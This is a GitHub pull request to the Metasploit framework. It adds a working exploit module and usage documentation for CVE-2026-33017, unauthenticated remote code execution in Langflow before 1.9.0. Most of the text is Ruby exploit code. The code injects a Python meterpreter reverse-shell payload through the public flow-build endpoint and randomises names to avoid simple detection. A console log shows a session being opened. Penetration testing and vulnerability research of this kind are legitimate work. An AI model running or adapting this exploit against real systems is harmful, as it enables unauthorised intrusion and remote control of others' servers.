### PR TITLE
ENH: CISA KEV - Exploit module for CVE-2026-33017

### DIFF
--- a/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_33017.md
+++ b/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_33017.md
@@ -1,18 +1,19 @@
 ## Vulnerable Application
 
-Langflow versions prior to 1.9.0 are susceptible to code injection in the /api/v1/build_public_tmp/<flow_id>/flow
-endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
+Langflow versions prior to 1.9.0 are vulnerable to unauthenticated remote code execution through the
+`/api/v1/build_public_tmp/<flow_id>/flow` endpoint. An attacker can send crafted HTTP requests to execute arbitrary code.
 
 The vulnerability affects:
 
-    * Langflow < 1.9.0.
+* Langflow < 1.9.0.
 
 This module was successfully tested on:
 
-    * Langflow 1.8.4  (with authentication enabled)
+* Langflow 1.8.4 (with authentication enabled)
 
 
-### Installation
+## Installation
+
 1. `python3 -m pip install langflow==1.8.4`
 
 2. `python -m langflow run --host 0.0.0.0 --port 7860`
@@ -23,11 +24,18 @@ This module was successfully tested on:
 1. Install the application
 2. Start msfconsole
 3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2026_33017`
-4. Do: `run LHOST=<lhost> RHOSTS=<rhost> FLOW_ID=<flow id>`
-5. You should get a meterpreter
+4. Do: `set LHOST <lhost>`
+5. Do: `set RHOSTS <rhost>`
+6. Do: `set FLOW_ID <flow id>`
+7. Do: `exploit`
 
 
 ## Options
+
+### FLOW_ID
+
+The UUID of a public Langflow flow. This value can be obtained from the
+Langflow web interface when viewing a flow.
 
 
 ## Scenarios
@@ -45,10 +53,13 @@ msf exploit(multi/http/langflow_unauth_rce_cve_2026_33017) > exploit
 [*] Started reverse TCP handler on 127.0.0.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Version 1.8.4 detected.
-[*] Server returned 200
-{"job_id":"f646683d-94b8-4a84-9234-ed30b796bb24"}
+[*] Payload sent successfully.
 [*] Sending stage (23408 bytes) to 127.0.0.1
 [*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54764) at 2026-07-23 17:07:34 -0400
 
 meterpreter > 
 ```
+
+## References
+
+- https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896

--- a/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_33017.md
+++ b/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_33017.md
@@ -1,0 +1,54 @@
+## Vulnerable Application
+
+Langflow versions prior to 1.9.0 are susceptible to code injection in the /api/v1/build_public_tmp/<flow_id>/flow
+endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
+
+The vulnerability affects:
+
+    * Langflow < 1.9.0.
+
+This module was successfully tested on:
+
+    * Langflow 1.8.4  (with authentication enabled)
+
+
+### Installation
+1. `python3 -m pip install langflow==1.8.4`
+
+2. `python -m langflow run --host 0.0.0.0 --port 7860`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2026_33017`
+4. Do: `run lhost=<lhost> rhost=<rhost> FLOW_ID=<flow id>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf > use exploit/multi/http/langflow_unauth_rce_cve_2026_33017
+[*] Using configured payload python/meterpreter/reverse_tcp
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_33017) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_33017) > set LHOST 127.0.0.1
+LHOST => 127.0.0.1
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_33017) > set FLOW_ID fd1d9d9b-6174-4b31-a621-2ee0f57435e2
+FLOW_ID => fd1d9d9b-6174-4b31-a621-2ee0f57435e2
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_33017) > exploit
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP handler on 127.0.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.8.4 detected.
+[*] Server returned 200
+{"job_id":"f646683d-94b8-4a84-9234-ed30b796bb24"}
+[*] Sending stage (23408 bytes) to 127.0.0.1
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54764) at 2026-07-23 17:07:34 -0400
+
+meterpreter > 
+```

--- a/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_33017.md
+++ b/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_33017.md
@@ -23,7 +23,7 @@ This module was successfully tested on:
 1. Install the application
 2. Start msfconsole
 3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2026_33017`
-4. Do: `run lhost=<lhost> rhost=<rhost> FLOW_ID=<flow id>`
+4. Do: `run LHOST=<lhost> RHOSTS=<rhost> FLOW_ID=<flow id>`
 5. You should get a meterpreter
 
 

--- a/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_33017.md
+++ b/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_33017.md
@@ -1,0 +1,69 @@
+## Vulnerable Application
+
+Langflow versions prior to 1.9.0 are vulnerable to unauthenticated remote code execution through the
+`/api/v1/build_public_tmp/<flow_id>/flow` endpoint. An attacker can send crafted HTTP requests to execute arbitrary code.
+
+The vulnerability affects:
+
+* Langflow < 1.9.0.
+
+This module was successfully tested on:
+
+* Langflow 1.8.4 (with authentication enabled)
+
+
+## Installation
+
+1. `docker pull langflowai/langflow:1.8.4`
+2. `docker run -d --name langflow-1.8.4 -p 7860:7860 langflowai/langflow:1.8.4`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2026_33017`
+4. Do: `set LHOST <lhost>`
+5. Do: `set RHOSTS <rhost>`
+6. Do: `set FLOW_ID <flow id>`
+7. Do: `exploit`
+
+
+## Options
+
+### FLOW_ID
+The UUID of a public Langflow flow. This value can be obtained from the
+Langflow web interface when viewing a flow.
+
+To make a flow public:
+1. Navigate to the Langflow web UI at http://<ip address>:7860
+2. Within the UI, either select an existing flow from the list, or click on New Flow
+3. In the top right of the screen, click on Share.
+4. Toggle the Shareable Playground radio button so its enabled.
+
+
+## Scenarios
+```
+msf > use exploit/multi/http/langflow_unauth_rce_cve_2026_33017
+[*] Using configured payload python/meterpreter/reverse_tcp
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_33017) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_33017) > set LHOST 127.0.0.1
+LHOST => 127.0.0.1
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_33017) > set FLOW_ID fd1d9d9b-6174-4b31-a621-2ee0f57435e2
+FLOW_ID => fd1d9d9b-6174-4b31-a621-2ee0f57435e2
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_33017) > exploit
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP handler on 127.0.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.8.4 appears vulnerable.
+[*] Payload sent successfully.
+[*] Sending stage (23408 bytes) to 127.0.0.1
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54764) at 2026-07-23 17:07:34 -0400
+
+meterpreter >
+```
+
+## References
+
+- https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_33017.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_33017.rb
@@ -81,6 +81,22 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     flow_id = datastore['FLOW_ID']
+
+    # The payload is placed at module top-level scope so it executes immediately
+    # when Langflow evals the code string, without waiting for any output method
+    # to be called. The class definition follows after so Langflow can still
+    # resolve the component vertex. Structure mirrors the working PoC exactly.
+    injected_code = "from lfx.custom.custom_component.component import Component\n" \
+                    "from lfx.io import Output\n" \
+                    "from lfx.schema.data import Data\n" \
+                    "\n" \
+                    "class ExploitComp(Component):\n" \
+                    "    display_name='X'\n" \
+                    "    outputs=[Output(display_name='O',name='o',method='r')]\n" \
+                    "    def r(self)->Data:\n" \
+                    "        #{payload.encode.gsub("\n", "\n        ")}\n" \
+                    "        return Data(data={})\n"
+
     data = {
       'data' => {
         'nodes' => [
@@ -101,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
                     'required' => true,
                     'show' => true,
                     'multiline' => true,
-                    'value' => "#{payload.encode}\n\nfrom lfx.custom_custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n    display_name=\"X\"\n    outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n    def r(self)->Data:\n        return Data(data={})",
+                    'value' => injected_code,
                     'name' => 'code',
                     'password' => false,
                     'advanced' => false,
@@ -112,7 +128,27 @@ class MetasploitModule < Msf::Exploit::Remote
                 'description' => 'X',
                 'base_classes' => ['Data'],
                 'display_name' => 'ExploitComp',
-                'name' => 'ExploitComp'
+                'name' => 'ExploitComp',
+                'frozen' => false,
+                'outputs' => [
+                  {
+                    'types' => ['Data'],
+                    'selected' => 'Data',
+                    'name' => 'o',
+                    'display_name' => 'O',
+                    'method' => 'r',
+                    'value' => '__UNDEFINED__',
+                    'cache' => true,
+                    'allows_loop' => false,
+                    'tool_mode' => false,
+                    'hidden' => nil,
+                    'required_inputs' => nil,
+                    'group_outputs' => false
+                  }
+                ],
+                'field_order' => ['code'],
+                'beta' => false,
+                'edited' => false
               }
             }
           }

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_33017.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_33017.rb
@@ -20,8 +20,8 @@ class MetasploitModule < Msf::Exploit::Remote
           attacker can send crafted HTTP requests to execute arbitrary code.
         },
         'Author' => [
+          'Richard Howe <rhowe425>',
           'Diamorphine',
-          'Richard Howe <rhowe425>'
         ],
         'License' => MSF_LICENSE,
         'References' => [

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_33017.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_33017.rb
@@ -172,6 +172,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::UnexpectedReply, 'Unexpected server reply.') unless res
 
-    print_status("Payload sent successfully.")
+    print_status('Payload sent successfully.')
   end
 end

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_33017.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_33017.rb
@@ -1,0 +1,140 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Langflow Unauth RCE',
+        'Description' => %q{
+          Langflow versions prior to 1.9.0 are susceptible to code injection in the
+          /api/v1/build_public_tmp/<flow_id>/flow endpoint. A remote and unauthenticated
+          attacker can send crafted HTTP requests to execute arbitrary code.
+        },
+        'Author' => [
+          'Diamorphine',
+          'Richard Howe <rhowe425>'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-33017'],
+          ['EDB', '52627'],
+          ['URL', 'https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896']
+        ],
+        'Targets' => [
+          [
+            'Python payload',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON,
+              'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Payload' => {
+          'BadChars' => '"'
+        },
+        'DisclosureDate' => '2026-03-20',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('FLOW_ID', [true, 'Public Langflow flow UUID', nil]),
+        Opt::RPORT(7860)
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/version')
+    })
+
+    return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
+
+    json_version = res&.get_json_document&.fetch('version', nil)
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless json_version
+
+    version = Rex::Version.new(json_version)
+    return Exploit::CheckCode::Unknown('Failed to get version.') unless version
+
+    return Exploit::CheckCode::Appears("Version #{version} detected.") if version < Rex::Version.new('1.9.0')
+
+    Exploit::CheckCode::Safe("Version #{version} does not appear vulnerable.")
+  end
+
+  def exploit
+    flow_id = datastore['FLOW_ID']
+    data = {
+      'data' => {
+        'nodes' => [
+          {
+            'id' => 'Exploit-001',
+            'type' => 'genericNode',
+            'position' => {
+              'x' => 0,
+              'y' => 0
+            },
+            'data' => {
+              'id' => 'Exploit-001',
+              'type' => 'ExploitComp',
+              'node' => {
+                'template' => {
+                  'code' => {
+                    'type' => 'code',
+                    'required' => true,
+                    'show' => true,
+                    'multiline' => true,
+                    'value' => "#{payload.encode}\n\nfrom lfx.custom_custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n    display_name=\"X\"\n    outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n    def r(self)->Data:\n        return Data(data={})",
+                    'name' => 'code',
+                    'password' => false,
+                    'advanced' => false,
+                    'dynamic' => false
+                  },
+                  '_type' => 'Component'
+                },
+                'description' => 'X',
+                'base_classes' => ['Data'],
+                'display_name' => 'ExploitComp',
+                'name' => 'ExploitComp'
+              }
+            }
+          }
+        ],
+        'edges' => []
+      },
+      'inputs' => nil
+    }
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, "api/v1/build_public_tmp/#{flow_id}/flow"),
+      'headers' => {
+        'Content-Type' => 'application/json'
+      },
+      'cookie' => "client_id=#{Rex::Text.rand_text_alpha(8)}",
+      'data' => data.to_json
+    })
+
+    fail_with(Failure::Unknown, 'Unexpected server reply.') unless res
+
+    print_status("Server returned #{res.code}")
+    print_line(res.body)
+  end
+end

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_33017.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_33017.rb
@@ -84,18 +84,27 @@ class MetasploitModule < Msf::Exploit::Remote
     flow_id = datastore['FLOW_ID']
     fail_with(Failure::BadConfig, 'FLOW_ID is required.') unless flow_id
 
+    # Randomize component identifiers
+    node_id = Rex::Text.rand_text_alpha(8)
+    component_display_name = Rex::Text.rand_text_alpha(5)
+    component_name = "Exploit#{Rex::Text.rand_text_alpha(5)}"
+
+    output_display_name = Rex::Text.rand_text_alpha(5)
+    output_name = Rex::Text.rand_text_alpha(5).downcase
+    output_method = Rex::Text.rand_text_alpha(5).downcase
+
     # The payload is placed at module top-level scope so it executes immediately
     # when Langflow evals the code string, without waiting for any output method
     # to be called. The class definition follows after so Langflow can still
-    # resolve the component vertex. Structure mirrors the working PoC exactly.
+    # resolve the component vertex.
     injected_code = "from lfx.custom.custom_component.component import Component\n" \
                     "from lfx.io import Output\n" \
                     "from lfx.schema.data import Data\n" \
                     "\n" \
-                    "class ExploitComp(Component):\n" \
-                    "    display_name='X'\n" \
-                    "    outputs=[Output(display_name='O',name='o',method='r')]\n" \
-                    "    def r(self)->Data:\n" \
+                    "class #{component_name}(Component):\n" \
+                    "    display_name='#{component_display_name}'\n" \
+                    "    outputs=[Output(display_name='#{output_display_name}',name='#{output_name}',method='#{output_method}')]\n" \
+                    "    def #{output_method}(self)->Data:\n" \
                     "        #{payload.encode.gsub("\n", "\n        ")}\n" \
                     "        return Data(data={})\n"
 
@@ -103,15 +112,15 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => {
         'nodes' => [
           {
-            'id' => 'Exploit-001',
+            'id' => node_id,
             'type' => 'genericNode',
             'position' => {
               'x' => 0,
               'y' => 0
             },
             'data' => {
-              'id' => 'Exploit-001',
-              'type' => 'ExploitComp',
+              'id' => node_id,
+              'type' => component_name,
               'node' => {
                 'template' => {
                   'code' => {
@@ -127,18 +136,18 @@ class MetasploitModule < Msf::Exploit::Remote
                   },
                   '_type' => 'Component'
                 },
-                'description' => 'X',
+                'description' => component_display_name,
                 'base_classes' => ['Data'],
-                'display_name' => 'ExploitComp',
-                'name' => 'ExploitComp',
+                'display_name' => component_name,
+                'name' => component_name,
                 'frozen' => false,
                 'outputs' => [
                   {
                     'types' => ['Data'],
                     'selected' => 'Data',
-                    'name' => 'o',
-                    'display_name' => 'O',
-                    'method' => 'r',
+                    'name' => output_name,
+                    'display_name' => output_display_name,
+                    'method' => output_method,
                     'value' => '__UNDEFINED__',
                     'cache' => true,
                     'allows_loop' => false,

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_33017.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_33017.rb
@@ -15,9 +15,9 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Langflow Unauth RCE',
         'Description' => %q{
-          Langflow versions prior to 1.9.0 are susceptible to code injection in the
-          /api/v1/build_public_tmp/<flow_id>/flow endpoint. A remote and unauthenticated
-          attacker can send crafted HTTP requests to execute arbitrary code.
+          Langflow versions prior to 1.9.0 are susceptible to unauthenticated remote code execution through the
+          /api/v1/build_public_tmp/<flow_id>/flow endpoint. A remote and unauthenticated attacker can send crafted
+          HTTP requests to execute arbitrary code.
         },
         'Author' => [
           'Richard Howe <rhowe425>',
@@ -68,19 +68,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
 
-    json_version = res&.get_json_document&.fetch('version', nil)
-    return Exploit::CheckCode::Unknown('Failed to parse version.') unless json_version
+    version = res.get_json_document['version']
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
 
-    version = Rex::Version.new(json_version)
-    return Exploit::CheckCode::Unknown('Failed to get version.') unless version
+    version = Rex::Version.new(version)
 
-    return Exploit::CheckCode::Appears("Version #{version} detected.") if version < Rex::Version.new('1.9.0')
-
-    Exploit::CheckCode::Safe("Version #{version} does not appear vulnerable.")
+    if version < Rex::Version.new('1.9.0')
+      Exploit::CheckCode::Appears("Version #{version} appears vulnerable.")
+    else
+      Exploit::CheckCode::Safe("Version #{version} is not vulnerable.")
+    end
   end
 
   def exploit
     flow_id = datastore['FLOW_ID']
+    fail_with(Failure::BadConfig, 'FLOW_ID is required.') unless flow_id
 
     # The payload is placed at module top-level scope so it executes immediately
     # when Langflow evals the code string, without waiting for any output method
@@ -168,9 +170,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => data.to_json
     })
 
-    fail_with(Failure::Unknown, 'Unexpected server reply.') unless res
+    fail_with(Failure::UnexpectedReply, 'Unexpected server reply.') unless res
 
-    print_status("Server returned #{res.code}")
-    print_line(res.body)
+    print_status("Payload sent successfully.")
   end
 end

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_33017.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_33017.rb
@@ -1,0 +1,202 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Langflow Unauth RCE',
+        'Description' => %q{
+          Langflow versions prior to 1.9.0 are susceptible to unauthenticated remote code execution through the
+          /api/v1/build_public_tmp/<flow_id>/flow endpoint. A remote and unauthenticated attacker can send crafted
+          HTTP requests to execute arbitrary code.
+        },
+        'Author' => [
+          'Richard Howe <rhowe425>',  # Metasploit module
+          'Diamorphine'               # Discovered vulnerability
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-33017'],
+          ['EDB', '52627'],
+          ['URL', 'https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896']
+        ],
+        'Targets' => [
+          [
+            'Python payload',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Payload' => {
+          'BadChars' => '"'
+        },
+        'DisclosureDate' => '2026-03-20',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base path', '/']),
+        OptString.new('FLOW_ID', [true, 'Public Langflow flow UUID', nil]),
+        Opt::RPORT(7860)
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'api/v1/version')
+      }
+    )
+    return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
+
+    doc = res.get_json_document
+    package = doc.is_a?(Hash) ? doc['package'] : nil
+    version_str = doc.is_a?(Hash) ? doc['version'] : nil
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version_str
+    return Exploit::CheckCode::Unknown('Failed to identify application.') unless package
+    return Exploit::CheckCode::Safe('Application is not Langflow.') unless package.to_s.downcase == 'langflow'
+
+    begin
+      version = Rex::Version.new(version_str)
+    rescue StandardError
+      return Exploit::CheckCode::Unknown('Failed to parse version.')
+    end
+
+    if version < Rex::Version.new('1.9.0')
+      Exploit::CheckCode::Appears("Version #{version} appears vulnerable.")
+    else
+      Exploit::CheckCode::Safe("Version #{version} is not vulnerable.")
+    end
+  end
+
+  def exploit
+    flow_id = datastore['FLOW_ID']
+    fail_with(Failure::BadConfig, 'FLOW_ID is required.') unless flow_id
+
+    # Randomize component identifiers
+    node_id = Rex::Text.rand_text_alpha(8)
+    component_display_name = Rex::Text.rand_text_alpha(5)
+    component_name = "Exploit#{Rex::Text.rand_text_alpha(5)}"
+
+    output_display_name = Rex::Text.rand_text_alpha(5)
+    output_name = Rex::Text.rand_text_alpha(5).downcase
+    output_method = Rex::Text.rand_text_alpha(5).downcase
+
+    # The payload is executed within the output method so it runs when the
+    # component vertex is invoked; the class definition allows Langflow to
+    # resolve the component vertex.
+    injected_code = "from lfx.custom.custom_component.component import Component\n" \
+                    "from lfx.io import Output\n" \
+                    "from lfx.schema.data import Data\n" \
+                    "\n" \
+                    "class #{component_name}(Component):\n" \
+                    "    display_name='#{component_display_name}'\n" \
+                    "    outputs=[Output(display_name='#{output_display_name}',name='#{output_name}',method='#{output_method}')]\n" \
+                    "    def #{output_method}(self)->Data:\n" \
+                    "        #{payload.encode.gsub("\n", "\n        ")}\n" \
+                    "        return Data(data={})\n"
+
+    data = {
+      'data' => {
+        'nodes' => [
+          {
+            'id' => node_id,
+            'type' => 'genericNode',
+            'position' => {
+              'x' => 0,
+              'y' => 0
+            },
+            'data' => {
+              'id' => node_id,
+              'type' => component_name,
+              'node' => {
+                'template' => {
+                  'code' => {
+                    'type' => 'code',
+                    'required' => true,
+                    'show' => true,
+                    'multiline' => true,
+                    'value' => injected_code,
+                    'name' => 'code',
+                    'password' => false,
+                    'advanced' => false,
+                    'dynamic' => false
+                  },
+                  '_type' => 'Component'
+                },
+                'description' => component_display_name,
+                'base_classes' => ['Data'],
+                'display_name' => component_name,
+                'name' => component_name,
+                'frozen' => false,
+                'outputs' => [
+                  {
+                    'types' => ['Data'],
+                    'selected' => 'Data',
+                    'name' => output_name,
+                    'display_name' => output_display_name,
+                    'method' => output_method,
+                    'value' => '__UNDEFINED__',
+                    'cache' => true,
+                    'allows_loop' => false,
+                    'tool_mode' => false,
+                    'hidden' => nil,
+                    'required_inputs' => nil,
+                    'group_outputs' => false
+                  }
+                ],
+                'field_order' => ['code'],
+                'beta' => false,
+                'edited' => false
+              }
+            }
+          }
+        ],
+        'edges' => []
+      },
+      'inputs' => nil
+    }
+
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, "api/v1/build_public_tmp/#{flow_id}/flow"),
+        'headers' => {
+          'Content-Type' => 'application/json'
+        },
+        'cookie' => "client_id=#{Rex::Text.rand_text_alpha(8)}",
+        'data' => data.to_json
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Unexpected server reply.') unless res
+
+    unless res.code.between?(200, 299)
+      fail_with(Failure::UnexpectedReply, "Unexpected server reply (HTTP #{res.code}).")
+    end
+
+    print_status('Payload sent successfully.')
+  end
+end


### PR DESCRIPTION
## Description
This pull request adds a new exploit module that exploits an unauth RCE vulnerability in the _/api/v1/build_public_tmp/{flow_id}/flow_ endpoint in Langflow versions prior to 1.9.0

[Addition of CVE to CISA KEV](https://www.cisa.gov/news-events/alerts/2026/03/25/cisa-adds-one-known-exploited-vulnerability-catalog)

**Related Issue:** 
Fixes #21698 

## Breaking Changes
None

## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2026_33017`
4. Do: `run LHOST=<lhost> RHOSTS=<rhost> FLOW_ID=<flow id>`
5. A meterpreter session is initiated


## Test Evidence
<img width="909" height="344" alt="image" src="https://github.com/user-attachments/assets/6d74ecdc-50aa-42e9-8921-f0eca7076775" />



## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Ubuntu 22.04 |
| **Target Software/Hardware** | Langflow version 1.8.4 |


## AI Usage Disclosure
None



## Pre-Submission Checklist

- [x] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [x] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [x] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)